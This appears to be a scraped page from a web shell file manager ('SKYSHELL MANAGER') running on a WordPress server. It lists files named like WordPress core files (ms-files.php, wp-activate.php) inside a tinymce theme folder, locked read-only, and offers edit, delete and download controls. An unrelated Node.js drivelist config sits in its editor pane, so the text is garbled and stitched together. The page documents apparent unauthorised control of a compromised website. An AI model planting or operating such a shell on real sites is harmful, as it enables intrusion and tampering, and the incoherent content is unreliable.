📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: drivelist.js
'use strict'; module.exports = { pkg: { patches: { 'build/scripts.js': [ "path.join(__dirname, '..', 'scripts')", "path.join(path.dirname(process.execPath), 'drivelist')", ], 'lib/scripts.js': [ "path.join(__dirname, '..', 'scripts')", "path.join(path.dirname(process.execPath), 'drivelist')", // for 4.0.0 ], }, deployFiles: [ ['build/Release/drivelist.node', 'drivelist.node'], ['scripts/darwin.sh', 'drivelist/darwin.sh'], ['scripts/linux.sh', 'drivelist/linux.sh'], ['scripts/win32.bat', 'drivelist/win32.bat'], ], }, };
Save